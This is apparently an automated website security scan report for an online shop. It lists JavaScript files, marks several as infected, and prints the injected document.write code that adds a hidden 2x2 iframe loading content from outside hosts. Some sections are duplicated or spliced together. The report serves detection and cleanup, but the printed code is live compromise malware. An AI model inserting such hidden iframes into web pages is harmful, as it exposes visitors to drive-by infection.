Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bffoffer.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.bffoffer.com/ | 200 OK Content-Length: 77837 Content-Type: text/html | clean |
http://www.bffoffer.com/js/prototype/prototype.js | 200 OK Content-Length: 163313 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/lib/ccard.js | 200 OK Content-Length: 749 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/prototype/validation.js | 200 OK Content-Length: 37720 Content-Type: text/javascript | malicious |
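Malicious code (confirmed by antivirus engines, see below). The injected statement writes a hidden 2x2 iframe into the page, which loads content from a third-party host:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632></iframe>');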
var Validator = Class.create(); Validator.prototype = { initialize : function(className, error, test, options) { if(typeof test == 'function'){ this.options = $H(options); this._test = test; } else { this.options = $H(test); 'MC': [new RegExp('^5[1-5][0-9]{14}$'), new RegExp('^[0-9]{3}$'), true], 'AE': [new RegExp('^3[47][0-9]{13}$'), new RegExp('^[0-9]{4}$'), true], 'DI': [new RegExp('^6011[0-9]{12}$'), new RegExp('^[0-9]{3}$'), true], 'JCB': [new RegExp('^(3[0-9]{15}|(2131|1800)[0-9]{11})$'), new RegExp('^[0-9]{4}$'), true], 'OT': [false, new RegExp('^([0-9]{3}|[0-9]{4})?$'), false] }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/builder.js | 200 OK Content-Length: 4899 Content-Type: text/javascript | malicious |
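Malicious code (confirmed by antivirus engines, see below). This is the same injected iframe pattern with the same j=905632 parameter as in validation.js, but it points to a second host:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');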
var Builder = { NODEMAP: { AREA: 'map', CAPTION: 'table', COL: 'table', COLGROUP: 'table', LEGEND: 'fieldset', OPTGROUP: 'select', OPTION: 'select', PARAM: 'object', TBODY: 'table', TD: 'table', TFOOT: 'table', TH: 'table', "KBD LABEL LEGEND LI LINK MAP MENU META NOFRAMES NOSCRIPT OBJECT OL OPTGROUP OPTION P "+ "PARAM PRE Q S SAMP SCRIPT SELECT SMALL SPAN STRIKE STRONG STYLE SUB SUP TABLE TBODY TD "+ "TEXTAREA TFOOT TH THEAD TITLE TR TT U UL VAR").split(/\s+/); tags.each( function(tag){ scope[tag] = function() { return Builder.node.apply(Builder, [tag].concat($A(arguments))); }; }); } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/effects.js | 200 OK Content-Length: 38907 Content-Type: text/javascript | malicious |
Malicious code (confirmed by antivirus engines, see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632></iframe>');
String.prototype.parseColor = function() { var color = '#'; if (this.slice(0,4) == 'rgb(') { var cols = this.slice(4,this.length-1).split(','); var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3); } else { if (this.slice(0,1) == '#') { if (this function(effect) { Effect.Methods[effect] = function(element, options){ element = $(element); Effect[effect.charAt(0).toUpperCase() + effect.substring(1)](element, options); return element; }; } ); $w('getInlineOpacity forceRerendering setContentZoom collectTextNodes collectTextNodesIgnoreClass getStyles').each( function(f) { Effect.Methods[f] = Element[f]; } ); Element.addMethods(Effect.Methods); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 31354 Content-Type: text/javascript | malicious |
Malicious code (confirmed by antivirus engines, see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632></iframe>');
if(Object.isUndefined(Effect)) throw("dragdrop.js requires including script.aculo.us' effects.js library"); var Droppables = { drops: [], remove: function(element) { this.drops = this.drops.reject(function(d) { return d.element==$(element) }); }, add: function(element) { elements.push(e); if(recursive) { var grandchildren = Element.findChildren(e, only, recursive, tagName); if(grandchildren) elements.push(grandchildren); } }); return (elements.length>0 ? elements.flatten() : []); }; Element.offsetSize = function (element, type) { return element['offset' + ((type=='vertical' || type=='height') ? 'Height' : 'Width')]; }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://fernandoescobar.cl/cazd.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://fernandoescobar.cl/cazd.html?j=905632> | ||
http://www.bffoffer.com/js/scriptaculous/controls.js | 200 OK Content-Length: 34801 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/scriptaculous/slider.js | 200 OK Content-Length: 10335 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/varien/js.js | 200 OK Content-Length: 22114 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/varien/form.js | 200 OK Content-Length: 11868 Content-Type: text/javascript | malicious |
Malicious code (confirmed by antivirus engines, see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');
VarienForm = Class.create(); VarienForm.prototype = { initialize: function(formId, firstFieldFocus){ this.form = $(formId); if (!this.form) { return; } this.cache = $A(); this.currLoader = false; this.currDataIndex while (this.zipElement.hasClassName('required-entry')) { this.zipElement.removeClassName('required-entry'); } if (wildCard != undefined) { wildCard.hide(); } } else { this.zipElement.addClassName('required-entry'); if (wildCard != undefined) { wildCard.show(); } } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/varien/menu.js | 200 OK Content-Length: 4580 Content-Type: text/javascript | malicious |
Malicious code (confirmed by antivirus engines, see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');
var mainNav = function() { var main = { obj_nav : $(arguments[0]) || $("nav"), settings : { show_delay : 0, hide_delay : 0, _ie6 : /MSIE 6.+Win/.test(navigator.userAgent), _ie7 : /MSIE 7 sub_elm.removeClassName("shown-sub"); } }, main.settings.hide_delay); } }; if (arguments[1]) { main.settings = Object.extend(main.settings, arguments[1]); } if (main.obj_nav) { main.init(main.obj_nav, false); } }; document.observe("dom:loaded", function() { mainNav("nav", {"show_delay":"100","hide_delay":"100"}); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/mage/translate.js | 200 OK Content-Length: 1751 Content-Type: text/javascript | malicious |
Malicious code (confirmed by antivirus engines, see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632></iframe>');
var Translate = Class.create(); Translate.prototype = { initialize: function(data){ this.data = $H(data); }, translate : function(){ var args = arguments; var text = arguments[0]; if(this.data.get(text)){ return this.data.get(text); } return text; }, add : function() { if (arguments.length > 1) { this.data.set(arguments[0], arguments[1]); } else if (typeof arguments[0] =='object') { $H(arguments[0]).each(function (pair){ this.data.set(pair.key, pair.value); }.bind(this)); } } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cutedge.org/amef.html?j=905632 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cutedge.org/amef.html?j=905632> | ||
http://www.bffoffer.com/js/mage/cookies.js | 200 OK Content-Length: 2615 Content-Type: text/javascript | clean |
http://www.bffoffer.com/js/magestore/productoffer.js | 200 OK Content-Length: 8802 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bffoffer.com
Result:
GET / HTTP/1.1
Host: bffoffer.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bffoffer.com
Referer: http://www.google.com/search?q=bffoffer.com
Result:
The result is similar to that of the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: bffoffer.com
Referer: http://www.google.com/search?q=bffoffer.com
Result:
The result is similar to that of the first query. No suspicious redirects were found.